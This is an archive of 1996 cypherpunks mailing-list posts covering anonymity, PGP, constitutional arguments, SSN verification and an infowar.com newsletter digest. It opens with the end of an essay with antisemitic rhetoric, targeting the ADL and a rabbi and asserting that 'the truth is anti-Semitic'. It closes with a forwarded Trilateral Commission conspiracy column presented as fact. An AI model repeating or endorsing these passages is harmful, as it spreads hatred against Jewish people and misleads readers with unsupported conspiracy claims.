Oklahoma had allowed his Administration to launch a maximum
political/propaganda counter-offensive against the rapidly growing
discontent with, and mistrust of the federal government. Black smoke,
mutilated bodies, dying children, crying distraught mothers, created
exactly the atmosphere the government needed to turn things around. John
Deutsch is the man in charge of that effort for the government. 

Censorship is a word of many meanings. In a narrow sense it of course may
refer to suppression of information, or ideas. In a broader sense
however, it is the rape of the human mind: Taking away that which is
needed to make fair, informed opinions about this life. The mental
rapist of today is no different in his goals than the back ally pervert who by force assaults a defenseless woman, taking from someone else that which he has no right to. Both acts are the works of the most
contemptible sorts of humankind, desperate men, fearful of the light of
day. What is being called for by the online information censors is the
equivalent to Bosnian ethnic cleansing' a sort of information cleansing
of the internet. 

It seems ironic to many that the ADL which has made innumerable calls for
"diversity" would spearhead these efforts at censorship. What is being
called for by them, the Simon Wiesenthal Center, and Rabbi Cooper is the
equivalent to Bosnian ethnic cleansing' a sort of information cleansing
of the internet. Perhaps a new organizational motto of "Many Cultures, One Opinion" would be more in line with true ADL objectives. It is not
just a little bit odd that the same people who fear firearms in the hands of the people fear information in the minds of people. The ADL
supported the recent government ban on certain types of firearms just as
it supports government action to censor the net. As firearms laws only
disarm honest citizens who obey the laws, information bans only effect
people who desire to think for themselves. One pundit has already
quipped that "I'll give up my information when they pry my cold dead fingers from the keyboard." 

In closing the author would like to make two additional things clear.
First, there are Jews who oppose censorship although to this point their
voice is but a whisper compared to the intolerance of the Anti- Defamation League and Rabbi Cooper. Second, that writing about Jewish religious
leaders and government spymasters operating in a collusive effort to
erect an electron iron curtain to restrict freedom of speech and
information does not make one anti-Semitic or anti-government. The truth
is anti-Semitic. The government is erecting a police state. The author
opposes both oppressive religious groups and repressive government. If
speaking the truth and opposing tyranny makes one anti-Semitic and
anti-government, then I am both... 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 14 Nov 1996 21:36:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Members of Parliament Problem
Message-ID: <v02140b01aeb1a0ff57d2@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


I read awhile ago that certain members of Parliament do not speak
their mind regarding the situation in Northern Ireland.  The reason
they give is that they have children and they fear the IRA.

There are times when one wishes to speak anonymously, yet speak
as a member of a group.

Is there a way to take published public keys and combine them with
your own in such a way that your identity is not compromised, but
it is clear beyond a doubt that you control one of a set of public
keys?

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 14 Nov 1996 19:49:37 -0800 (PST)
To: m5@tivoli.com
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <328B75D1.10A@tivoli.com>
Message-ID: <199611150338.VAA04307@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Mike McNally wrote:
> 
> Dave Hayes wrote:
> >
> >  Symbolically, he punched holes in his ideology. That's my
> > opinion.
> 
> Note that this is only true if John's ideology in the first placed
> was what you think it was.  He may have "punched holes" in the
> conception of John's ideology that you'd formed in your own mind,
> of course.

Umm, even if we accept Dave's claim that Gilmore pinched holes in 
his ideology, these holes are no bigger than Dave Hayes's own holes,
since he exercises censorship of Freedom Fighters mailing list.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Thu, 14 Nov 1996 12:42:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Black Unicorn exposed?
Message-ID: <199611142041.VAA03436@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Ahem. He used that nym in a post to cypherpunks
just a few months ago...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 14 Nov 1996 18:45:55 -0800 (PST)
To: putney <putney@rigel.infonex.com>
Subject: Re: Validating SSNs
In-Reply-To: <Pine.SOL.3.91.961113202851.18335A-100000@rigel.infonex.com>
Message-ID: <Pine.SUN.3.94.961114214245.24555B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, putney wrote:

> >At 4:13 PM 11/13/96, Black Unicorn wrote:
> 
> >>Exercise for the reader:  How does the bank verify SSNs?
> 
> >OK, I'll bite.
> 
> >My guess is that the bank sticks the SSN in a report to the IRS and the
> >bank is happy with the SSN as long as the IRS doesn't complain about it.
> 
> >Now, does the IRS check? I suspect that they don't, either. Their objective
> >is to look for "matches" with SSNs that show up on filed tax forms, since
> >they want to verify the data on the tax form. Given the behavior of every
> >other large database I've ever seen, I'd guess that there would be a huge
> >number of SSNs that don't in fact associate with tax forms. If someone High
> >Up hasn't decreed that they should chase such things down (and allocated
> >heaps of money to do it), they'll ignore the mismatches.
> 
> >This seems consistent with the reports of people who use bogus SSNs for
> >decades at a time.
> 
> >Rick.
> >smith@sctc.com
> 
> Yup - You've got it right.  A bank's responsibility is to make the SSN 
> match on tape with what the IRS has - thats it.  It was part of the big 
> stink in the 80's when congress first said that all banks had to withhold 
> on all interest, the banks yelled, and then the SSN match program was 
> instituted.

Wrong.  A bank's responsibility is to report the SSN given to the IRS and
forget about it until told to do otherwise.

> 
> There are significant fines for banks that do not follow up on 
> mis-matches, or do not begin "back-up" withholding.  One person is no big 
> deal, but they add up fast!

There are fines for refusing to comply with IRS directives to do so.
There is no direct responsibility for financial institutions in the
United States to investigate the SSN their customer provides other than to
complain to the depositor.

> The IRS's job is to collect income so if the number matches with a filing 
> then a-okay!
> 
> Yo.
> 
> Putney

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 14 Nov 1996 21:49:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: A Disservice to Mr. Bell
Message-ID: <199611150549.VAA18649@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 PM 11/14/96 -0500, hallam@vesuvius.ai.mit.edu wrote:

>>> Thats
>>>what the supremacy clause is all about. All previously existing courts
>>>were extinguished.
>
>>Ah!  So you admit that these courts were "previously existing," huh?  Well, 
>>if that's the case, merely read the 9th and 10th amendments and tell me how 
>>you're so sure that "all previously existing courts were extinguished."
>
>I admit no such thing if you could understand logic you would
>realize that. There were pre-existing courts, those of King George.

Misleading.  And wrong.  Wrong, because existing state courts were not 
eliminated.  And misleading, because both "commonlaw" and "equity" courts 
were "those of King George."  At least, the judges were appointed by the 
King.  But the revolution merely meant that George no longer had the 
authority to appoint the judges; it does not mean that the courts were, 
themselves, eliminated as institutions.

>They were extingished. 

"Extinguished"?  Like a fire, or something like that?  You really need to 
start using more exact terminology.  I think you're trying to read a lot 
more into the US Constitution than was written into it.  In order to be able 
to claim that it had an effect, you need to document that effect.  Find the 
particular section which "extinguished" a court.  Moreover, you need to 
explain why you're ignoring the 9th and 10th amendments, both of which make 
it clear that there was much continuity not affected by the Federal 
constitution.


>Had common law courts existed (they did not
>but for the sake of arguement I am indulging you in your fantasy) 

When did they not exist? Be very specific; are you referring to just 
America, or Britain as well?


>they would exist no longer.

You haven't documented this claim.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@pgp.com>
Date: Fri, 15 Nov 1996 10:32:03 -0800 (PST)
To: paul@fatmans.demon.co.uk
Subject: Re: PGP3.0 & ElGamal
In-Reply-To: <847990496.613504.0@fatmans.demon.co.uk>
Message-ID: <v03100803aeb1b55e8a4e@[205.180.136.70]>
MIME-Version: 1.0
Content-Type: text/plain


> Can someone confirm that PGP3.0 will use ElGamal?

Yes, it will.

________________________________________________________________________
Dave Del Torto                                      +1.415.65432.31  tel
Manager, Strategic Technical Evangelism             +1.415.631.0599  fax
Pretty Good Privacy, Inc.                        http://www.pgp.com  web






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@vesuvius.ai.mit.edu
Date: Thu, 14 Nov 1996 19:57:08 -0800 (PST)
To: jim bell <cypherpunks@toad.com
Subject: Re: A Disservice to Mr. Bell
In-Reply-To: <199611150340.TAA08395@mail.pacifier.com>
Message-ID: <9611150401.AA01751@vesuvius.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>You might be surprised to learn that this kind of thing doesn't bother me at 
>all.  To whatever extent such commonlaw courts act like loose cannons, they 
>will primarily tend to do so against those who are most abusive of the 
>public's perceived rights.

As a matter of fact the montana fruitcakes were principally into 
racial bigotry. If you care to read the documents they filed you would
know that.

>> Thats
>>what the supremacy clause is all about. All previously existing courts
>>were extinguished.

>Ah!  So you admit that these courts were "previously existing," huh?  Well, 
>if that's the case, merely read the 9th and 10th amendments and tell me how 
>you're so sure that "all previously existing courts were extinguished."

I admit no such thing if you could understand logic you would
realize that. There were pre-existing courts, those of King George.
They were extingished. Had common law courts existed (they did not
but for the sake of arguement I am indulging you in your fantasy) 
they would exist no longer.


		Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 14 Nov 1996 23:25:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: It is getting easier
Message-ID: <Pine.3.89.9611142353.A14422-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain


[From an infowar article on the list]
>(ENN) A free service called "Flight Trax" is now available on the
>World-Wide-Web.
>This  new information resource allows one to track the progress of any
>domestic airflight within the contigious 48 states.
>
>Call up:  http://www.amerwxcncpt.com/ with your favorite internet
>browser. The program will ask you for the flight number, the airline, 
and the destination airport (using the FAA designated three-letter code). 
>The program will
>then show you the kind of aricraft used, its flight's path, its location
>on that path (accurate to within two or three minutes), and its expected
>time of arrival at its destination. It will not tell you why it may have
>been delayed.
>The information is provided by Flyte-Comm of Ft. Lauderdale, FL, which
>uses data from the FAA to produce the flight estimates.  Might be prove

If I remember correctly, some of the newer transponders used on 
commercial aircraft actually transmit GPS data back to the controller in 
real time. I wonder how long it will be before the FAA will include such 
information in their database.

"To obtain the position of any passenger flight in the US within 10 
meters, click here."

-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "list" <list@infowar.com>
Date: Thu, 14 Nov 1996 21:19:32 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: infowar Digest for 14 Nov 1996
Message-ID: <199611150519.VAA27299@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


                       infowar Digest for 14 Nov 1996

Topics covered in this issue include:

   1: Flight Information Resource
             by Betty@infowar.com
   2: Flight Information Resource
             by Betty@infowar.com



--------------------------------------------------------------------------
1                                Message:0001                            1
--------------------------------------------------------------------------
To: infowar@infowar.com
From: "Betty G. O'Hearn" <betty@infowar.com>
Subject:


Infowar            Thursday November 14 1996        Volume 01: Number 03

We thank our sponsors:

Internet Security Solutions
New Dimensions International - Security Training
Secure Computing Corporation
HOMECOM Communications
National Computer Security Association
OPEN SOURCE SOLUTIONS, Inc.
__________________________________________________
Infowar@infowar.com is brought to you in the  the interest of an open,=
 unclassified exchange of information and ideas as a means for advancement=
 of Information Warfare related issues.   Topics of discussion for this list=
 include:  Infowar, Electronic Civil Defense, Hacking, Defensive Techniques,=
 Policy, Non-Lethals, Psyops, Chemical Warfare Agents and WMD.=20

As the list expands we will adapt to the needs and desires of our=
 subscribers.=20
__________________________________________________________
To: Infowar@infowar.com
From: winn@infowar.com
Subject: MCTL Process

Infowar.com is proud to have been given permission to publish the=20
latest  Military Critical Technologies List - Part I:  Weapons Systems=20
Technologies.=20

THE MCTL Process is the systemic ongoing assessment and analyses of=
 technologies to determine which technologies are Militarily Critical and=
 therefore should have additional controlsplaced  on them or made subject to=
 export control.=20

This document is the first of three parts.  Part two:  Weapons of Mass=20
Production and  Part three: Critical Developing Technologies  are in=
 development=20
and will be published when completed and made available to us.   Don't miss=
=20
reading this! Download Acrobat as the file is in  .pdf format. (acrobat=
 readers are free)  This file will be posted the week of November 17 1996.
------------------------------------------------------------
To:   Betty@infowar.com
From: "Eric L. Nelson, M.A." <enelson@nosc.mil>
Subject: G-TWO RECRUITMENT FORM
Sender: owner-g-two@majordomo.netcom.com

Please use this ammended form to inform your DOD intel
and CI colleagues about g-two.  Please discard previous
editions.

Thanks,

EL Nelson
moderator


Get The Word Out (G-TWO) is designed to provide direct assistance=20
to DOD intelligence and counterintelligence teams by providing=20
open-source intelligence and news summaries pertinent to DOD=20
interests.  Topics include:

    Political:
	Politics of intelligence.
	Political history of hotspots/groups/personalities.

    Information:
	WWW locations of intelligence usefulness with brief summaries.
	Lists, databases, and archives accessible via the internet.
	Resource sharing.

    NBC-M (nuclear, biological, chemical & medical):
	Biochem threat analysis/events (outbreaks).
	Medical technology and issues related to DOD missions/personnel.
	Tracking the development of NBC capabilities by country/group.

    Terrorism:
	Threat/threat mindsets/tactical intent.
	Issues related to security and threat issues.
	International Crime.
	New developments in terrorism.
	New technology/weapons systems with CT application.
	Info. on capability of Special Teams/personnel.

    Military/Intel Agencies:
	Force protection.
	OPSEC.
	Military plans/policies. =20
	Reports on terrorism/counter-terrorism activities.
	Data on military forces and capabilities (order of battle).

    Analysis:
	More analysis by SME's (subject matter experts).
	Emerging threat analysis.
	EOD/chemical analysis.
	Group profies (themes, objectives, etc.)  Who are these people?
	Cultural profiles and key info/customs to know.

    Technology & Industrial:
	Hacking/Infowar.
	Technology/precursor tracking, what is being procured by others.
	Industrial/technical intelligence on foreign countries-=20
		what are they doing?

    Other:
	Central/South American, and Caribbean information. =20
	Psychological profiles/cultural profiles of groups/personalities.
	Deception.
	Stateless Warfare Issues (gangs, 4th generation warfare).
	State department info. =20
	Washington Early Bird news summaries. =20
	World hot spot info.
	Information warfare.
        Daily news articles on terrorism and related issues
        State Department country studies
        State Department terrorist groups/personalities files
        Emergency News Network (ENN) updates
        Intelligent Concepts Daily News Summaries
        Special support tasking
	News flashes
        More to be added soon!

MEMBERSHIP: Limited to DOD intelligence and counterintelligence
personnel, (active, reserve, or retired).  Non-DOD intel/CI
applicants may request a waiver by demonstrating a need for=20
inclusion, (such as law enforcement intelligence, FBI, etc.)
To apply for membership answer the following questions and email
to Eric Nelson at:    =20

		enelson@rohan.sdsu.edu

<send the following>

 NAME/RANK:
 MILITARY UNIT/ORG:
 JOB TITLE:
 EMAIL ADDRESS:
 REG/RES/RET?
 NAME OF PERSON WHO REFERRED YOU (MANDATORY):

<clip here and send>

------------------------------------------------------------
From: "Robert A. Walton" <waltonr@meade-emh2.army.mil>=20
Subject: DC Area Infowar Event
Cc: "Betty G. O'Hearn" <betty@infowar.com>
Date: Thu, 14 Nov 1996 17:04:22 +0000

You may wish to post the following notice.

The Maryland chapter of Armed Forces Communications and Electronics=20
Association will have a luncheon meeting at the Fort Meade Officer's Club=20
on Tuesday, 19 November.  The lunch is at 11:45, the program follows at=20
12:30.  The speaker is Brigadier General Jaeger.  The topic is=20
"Information Warfare Exercise Lessons Learned."

The cost is $10.00 for the luncheon if you register today or Friday, or=20
$12.00 at the door Tuesday.  If you are interested in going, please call=20
Vicki Neuman at 301-317-9474 to make a reservation.

Thanks
Bob Walton
------------------------------------------------------------
To: infowar@infowar.com
From: aludwig@pacbell.net
Subject: Legal aspects of information warfare

My name is Aaron Ludwig and I am a third year law student at Whittier Law=20
School.  I am currently writing a law review article about the legal=20
aspects of information warfare.  If anyone has any insight or helpful=20
information regarding this topic please contact me at=20
aaronludwig@juno.com or simply reply to this mail.  The following are=20
just a few of the questions I hope to analyze and answer:

If the U.S. sustains an information-based attack, does this warrant an=20
armed response?(i.e., what constitutes an attack?)

What laws are involved in carrying out or defending against information=20
attacks?  What laws are involved in the detection of enemy information=20
warriors?

Last, but not least, I wonder whether anyone can tell me how to get a=20
hold of the proceedings of any of the information warfare conferences. =20
Keep in mind that I am a highly-leveraged (broke) law student.

Thank you.

Aaron
------------------------------------------------------------
To:       Infowar@infowar.com
From:   Betty@infowar.com
Subject:  Defense Science Board Task Force

 Defense Science Board Task Force on Information Warfare-Defense=20
(IW-D), will be issuing a report in the next few days.  Federal Computer=
 Week=20
has an interesting article stating that the report called the threat of an=
 IW=20
attack "significant," adding that the nation's "vulnerabilities are=
 numerous,=20
[and] the countermeasures are extremely limited...." You can read the=
 article at=20
  http://www.fcw.com/pubs/fcw/1111/duck.htm.  We will be publishing the=
 report=20
as it is made available to us.
------------------------------------------------------------
Date: 11 Nov 1996 20:13:20 CST
Subject: Flight Information Resource
Sender: owner-g-two@majordomo.netcom.com

ENN Info Update
11/11/96 - 20:00CST

New Information Resource Assists in Tracking Domestic Flights

(ENN) A free service called "Flight Trax" is now available on the
World-Wide-Web.
This  new information resource allows one to track the progress of any
domestic airflight within the contigious 48 states.

Call up:  http://www.amerwxcncpt.com/ with your favorite internet
browser. The program will ask you for the flight number, the airline, and=
 the destination airport (using the FAA designated three-letter code). The=
 program will
then show you the kind of aricraft used, its flight's path, its location
on that path (accurate to within two or three minutes), and its expected
time of arrival at its destination. It will not tell you why it may have
been delayed.

The information is provided by Flyte-Comm of Ft. Lauderdale, FL, which
uses data from the FAA to produce the flight estimates.  Might be prove
useful while waiting for Grandma's flight to come in from Des Moines, or
a variety of other uses.

Courtesy of:

EmergencyNet News Service
Emergency Response & Research Institute
6348 N. Milwaukee Ave., #312
Chicago, IL. 60646
(773) 631-3774 - Voice
(773) 631-4703 - Fax
(773) 631-3467 - Modem/Emergency BBS On-Line
http://www.emergency.com - Website
enn@emergency.com - E-mail
------------------------------------------------------------
END

Infowar            Thursday November 14 1996        Volume 01: Number 03


DIRECT REQUESTS to:    list@infowar.com with one-line in the BODY, NOT
in the subject line.

Subscribe infowar        TO JOIN GROUP
Unsubscribe infowar    TO LEAVE GROUP
Help infowar               TO RECEIVE HELP=20
TO POST A MESSAGE:  E-Mail to   infowar@infowar.com =20

_____________________________________________________
Infowar.Com
Interpact, Inc.
Winn Schwartau
winn@infowar.com
http://www.infowar.com
813-393-6600  Voice
813-393-6361  FAX

Sponsor Opportunities/Comments/Help

Betty G. O'Hearn
Assistant to Winn Schwartau
http://www.infowar.com
betty@infowar.com
813-367-7277  Voice
813-363-7277  FAX



--------------------------------------------------------------------------
2                                Message:0002                            2
--------------------------------------------------------------------------
To: infowar@infowar.com
From: "Betty G. O'Hearn" <betty@infowar.com>
Subject:


Infowar            Thursday November 14 1996        Volume 01: Number 03

We thank our sponsors:

Internet Security Solutions
New Dimensions International - Security Training
Secure Computing Corporation
HOMECOM Communications
National Computer Security Association
OPEN SOURCE SOLUTIONS, Inc.
__________________________________________________
Infowar@infowar.com is brought to you in the  the interest of an open, unclassified exchange of information and ideas as a means for advancement of Information Warfare related issues.   Topics of discussion for this list include:  Infowar, Electronic Civil Defense, Hacking, Defensive Techniques, Policy, Non-Lethals, Psyops, Chemical Warfare Agents and WMD. 

As the list expands we will adapt to the needs and desires of our subscribers. 
__________________________________________________________
To: Infowar@infowar.com
From: winn@infowar.com
Subject: MCTL Process

Infowar.com is proud to have been given permission to publish the 
latest  Military Critical Technologies List - Part I:  Weapons Systems 
Technologies. 

THE MCTL Process is the systemic ongoing assessment and analyses of technologies to determine which technologies are Militarily Critical and therefore should have additional controlsplaced  on them or made subject to export control. 

This document is the first of three parts.  Part two:  Weapons of Mass 
Production and  Part three: Critical Developing Technologies  are in development 
and will be published when completed and made available to us.   Don't miss 
reading this! Download Acrobat as the file is in  .pdf format. (acrobat readers are free)  This file will be posted the week of November 17 1996.
------------------------------------------------------------
To:   Betty@infowar.com
From: "Eric L. Nelson, M.A." <enelson@nosc.mil>
Subject: G-TWO RECRUITMENT FORM
Sender: owner-g-two@majordomo.netcom.com

Please use this ammended form to inform your DOD intel
and CI colleagues about g-two.  Please discard previous
editions.

Thanks,

EL Nelson
moderator


Get The Word Out (G-TWO) is designed to provide direct assistance 
to DOD intelligence and counterintelligence teams by providing 
open-source intelligence and news summaries pertinent to DOD 
interests.  Topics include:

    Political:
	Politics of intelligence.
	Political history of hotspots/groups/personalities.

    Information:
	WWW locations of intelligence usefulness with brief summaries.
	Lists, databases, and archives accessible via the internet.
	Resource sharing.

    NBC-M (nuclear, biological, chemical & medical):
	Biochem threat analysis/events (outbreaks).
	Medical technology and issues related to DOD missions/personnel.
	Tracking the development of NBC capabilities by country/group.

    Terrorism:
	Threat/threat mindsets/tactical intent.
	Issues related to security and threat issues.
	International Crime.
	New developments in terrorism.
	New technology/weapons systems with CT application.
	Info. on capability of Special Teams/personnel.

    Military/Intel Agencies:
	Force protection.
	OPSEC.
	Military plans/policies.  
	Reports on terrorism/counter-terrorism activities.
	Data on military forces and capabilities (order of battle).

    Analysis:
	More analysis by SME's (subject matter experts).
	Emerging threat analysis.
	EOD/chemical analysis.
	Group profies (themes, objectives, etc.)  Who are these people?
	Cultural profiles and key info/customs to know.

    Technology & Industrial:
	Hacking/Infowar.
	Technology/precursor tracking, what is being procured by others.
	Industrial/technical intelligence on foreign countries- 
		what are they doing?

    Other:
	Central/South American, and Caribbean information.  
	Psychological profiles/cultural profiles of groups/personalities.
	Deception.
	Stateless Warfare Issues (gangs, 4th generation warfare).
	State department info.  
	Washington Early Bird news summaries.  
	World hot spot info.
	Information warfare.
        Daily news articles on terrorism and related issues
        State Department country studies
        State Department terrorist groups/personalities files
        Emergency News Network (ENN) updates
        Intelligent Concepts Daily News Summaries
        Special support tasking
	News flashes
        More to be added soon!

MEMBERSHIP: Limited to DOD intelligence and counterintelligence
personnel, (active, reserve, or retired).  Non-DOD intel/CI
applicants may request a waiver by demonstrating a need for 
inclusion, (such as law enforcement intelligence, FBI, etc.)
To apply for membership answer the following questions and email
to Eric Nelson at:     

		enelson@rohan.sdsu.edu

<send the following>

 NAME/RANK:
 MILITARY UNIT/ORG:
 JOB TITLE:
 EMAIL ADDRESS:
 REG/RES/RET?
 NAME OF PERSON WHO REFERRED YOU (MANDATORY):

<clip here and send>

------------------------------------------------------------
From: "Robert A. Walton" <waltonr@meade-emh2.army.mil> 
Subject: DC Area Infowar Event
Cc: "Betty G. O'Hearn" <betty@infowar.com>
Date: Thu, 14 Nov 1996 17:04:22 +0000

You may wish to post the following notice.

The Maryland chapter of Armed Forces Communications and Electronics 
Association will have a luncheon meeting at the Fort Meade Officer's Club 
on Tuesday, 19 November.  The lunch is at 11:45, the program follows at 
12:30.  The speaker is Brigadier General Jaeger.  The topic is 
"Information Warfare Exercise Lessons Learned."

The cost is $10.00 for the luncheon if you register today or Friday, or 
$12.00 at the door Tuesday.  If you are interested in going, please call 
Vicki Neuman at 301-317-9474 to make a reservation.

Thanks
Bob Walton
------------------------------------------------------------
To: infowar@infowar.com
From: aludwig@pacbell.net
Subject: Legal aspects of information warfare

My name is Aaron Ludwig and I am a third year law student at Whittier Law 
School.  I am currently writing a law review article about the legal 
aspects of information warfare.  If anyone has any insight or helpful 
information regarding this topic please contact me at 
aaronludwig@juno.com or simply reply to this mail.  The following are 
just a few of the questions I hope to analyze and answer:

If the U.S. sustains an information-based attack, does this warrant an 
armed response?(i.e., what constitutes an attack?)

What laws are involved in carrying out or defending against information 
attacks?  What laws are involved in the detection of enemy information 
warriors?

Last, but not least, I wonder whether anyone can tell me how to get a 
hold of the proceedings of any of the information warfare conferences.  
Keep in mind that I am a highly-leveraged (broke) law student.

Thank you.

Aaron
------------------------------------------------------------
To:       Infowar@infowar.com
From:   Betty@infowar.com
Subject:  Defense Science Board Task Force

 Defense Science Board Task Force on Information Warfare-Defense 
(IW-D), will be issuing a report in the next few days.  Federal Computer Week 
has an interesting article stating that the report called the threat of an IW 
attack "significant," adding that the nation's "vulnerabilities are numerous, 
[and] the countermeasures are extremely limited...." You can read the article at 
  http://www.fcw.com/pubs/fcw/1111/duck.htm.  We will be publishing the report 
as it is made available to us.
------------------------------------------------------------
Date: 11 Nov 1996 20:13:20 CST
Subject: Flight Information Resource
Sender: owner-g-two@majordomo.netcom.com

ENN Info Update
11/11/96 - 20:00CST

New Information Resource Assists in Tracking Domestic Flights

(ENN) A free service called "Flight Trax" is now available on the
World-Wide-Web.
This  new information resource allows one to track the progress of any
domestic airflight within the contigious 48 states.

Call up:  http://www.amerwxcncpt.com/ with your favorite internet
browser. The program will ask you for the flight number, the airline, and the destination airport (using the FAA designated three-letter code). The program will
then show you the kind of aricraft used, its flight's path, its location
on that path (accurate to within two or three minutes), and its expected
time of arrival at its destination. It will not tell you why it may have
been delayed.

The information is provided by Flyte-Comm of Ft. Lauderdale, FL, which
uses data from the FAA to produce the flight estimates.  Might be prove
useful while waiting for Grandma's flight to come in from Des Moines, or
a variety of other uses.

Courtesy of:

EmergencyNet News Service
Emergency Response & Research Institute
6348 N. Milwaukee Ave., #312
Chicago, IL. 60646
(773) 631-3774 - Voice
(773) 631-4703 - Fax
(773) 631-3467 - Modem/Emergency BBS On-Line
http://www.emergency.com - Website
enn@emergency.com - E-mail
------------------------------------------------------------
END

Infowar            Thursday November 14 1996        Volume 01: Number 03


DIRECT REQUESTS to:    list@infowar.com with one-line in the BODY, NOT
in the subject line.

Subscribe infowar        TO JOIN GROUP
Unsubscribe infowar    TO LEAVE GROUP
Help infowar               TO RECEIVE HELP 
TO POST A MESSAGE:  E-Mail to   infowar@infowar.com  

_____________________________________________________
Infowar.Com
Interpact, Inc.
Winn Schwartau
winn@infowar.com
http://www.infowar.com
813-393-6600  Voice
813-393-6361  FAX

Sponsor Opportunities/Comments/Help

Betty G. O'Hearn
Assistant to Winn Schwartau
http://www.infowar.com
betty@infowar.com
813-367-7277  Voice
813-363-7277  FAX






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Thu, 14 Nov 1996 14:04:06 -0800 (PST)
To: "Mark M." <hyperlex@hol.gr>
Subject: The TRILATERAL COMMISSION -was: [REBUTTAL] Censorship on...
Message-ID: <199611150202.AAA01935@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 12:34 ðì 14/11/1996 -0500, Mark M. wrote:
(in response to me saying):
>> Man you're nutts. There are very few and quite vast Media Companies
>> in the world, and they're on the verge of becoming monopolies.
>> 
>> Even your American President is in reality a puppet of the Trilateral
>> Commission, who effectively also control CNN, the Washington Post,
>> and many many many other things all over the world.
>> 
>> And you are saying that control of the media by ownership is
>> impossible?  You're far out maaan! :-)
>> 
>> Only in America such a naive opinion could actually be _believed_.
>> (here I go again... aga! :-) )
>
>Is this a troll?

Nope; It's the truth. Expressed like a sarcastic joke as well, but
it's _true_. And not intended to be a troll at all.

As regards the "gullibility", it's plainly dangerous; And cultivated
by the Media, apparently stronger in the U.S. than in many other places.

But: How many times do I have to state explicitly that my grumbles about
America are not "anti-American" (troll) propaganda? Nope; They're grumbles
about _freedoms_, that if you Americans lose, the rest of the world will
_also_ lose, (even quicker, I think)... Here is a REAL example:



(written by E. Francis, on the "Trilateral Commission", and distributed
 to all members of his own -private- mailing list, of which I'm a part).


>THE LAND OF SHADOWS
>
>     Early this month is the last presidential 
>"election" before the year 2000. As of this writing and 
>long before, the election was decided in favor of Bill 
>Clinton. It works out astrologically, but the real 
>reason is because Clinton's bosses control the 
>corporations that control the nation, and they also 
>happen to own the major media which, shall we say, help 
>the public make up its mind about who to vote for -- 
>media like CNN, NBC, The Washington Post, The New York 
>Times, Tribune Co., Time-Warner and others.
>     This is not speculation, and if you would allow me 
>to pre-empt this astrological column with a brief 
>exposé, I will explain. All of these news organizations 
>are members of an international institution called the 
>Trilateral Commission (which is listed in the Manhattan 
>phone book, by the way). Bill Clinton and more than 20 
>of his cabinet ministers are also on the list. Bob Dole 
>isn't a member, and neither is Jack Kemp, so in a very 
>real sense, they are the outsider candidates.
>     Since the organization's creation in 1973, every 
>White House has had Trilateral Commission 
>representation, starting with former Vice President 
>Nelson D. Rockefeller, the brother of the Commission's 
>co-founder, David Rockefeller. In 1976, Jimmy Carter, a 
>member of the Commission and close associate of the 
>Rockefellers, was "elected" president, and so on down 
>the line in an unbroken chain through Bill Clinton. In 
>one presidential election in the 1980s, all three 
>candidates were Trilateralists! And in the election 
>right before the current one, it was Trilateralist 
>George Bush versus Trilateralist Bill Clinton. It's a 
>little like both candidates in the old Soviet elections 
>coming from the Communist party.
>     You may wonder, "What's the big deal?" But look at 
>it this way. What if every president or vice president 
>for the past 22 years had been an executive of Grumman 
>Aerospace or a graduate of Harvard University? You 
>might suspect that Grumman or Harvard had a little 
>extra influence and was getting its people into 
>positions of power. But since the nation's most 
>powerful media are also represented on the Commission, 
>its existence rarely gets reported, and its true nature 
>is never accurately reported except in the alternative 
>media. Check the National Newspaper Index in any 
>library and you'll find, at most, one or two references 
>to the Commission, and both seek to belittle its 
>importance.
>     And people who are involved in the organization 
>don't like to talk about it. I recently caught up with 
>Secretary of the Interior (and Trilateral Commission 
>member) Bruce Babbit while he was on a speaking 
>engagement at the posh Mohonk Mountain House in my 
>area. A number of newspaper reporters were gathered 
>around him asking him the usual trivia. When I asked 
>him directly about his involvement on the commission, 
>and the president's, and that of some two dozen other 
>cabinet members, with the red light of a video camera 
>coming from behind me, Bruce cracked a joke about how I 
>would be a popular guy "out west" (ostensibly where 
>everybody has weird political theories), then he turned 
>tail and ran away from the news conference.
>     Commission membership also includes key federal 
>legislators, people on the incredibly powerful Federal 
>Reserve Board, major bankers and the CEOs of numerous 
>corporations of the General Electric and General Foods 
>ilk. And it's an international institution as well, 
>_majority-dominated by business and political interests 
>in other lands, particularly Germany and Japan_. 
>Consider the implications. It is arguable that the 
>Trilateral White House is dominated by government and 
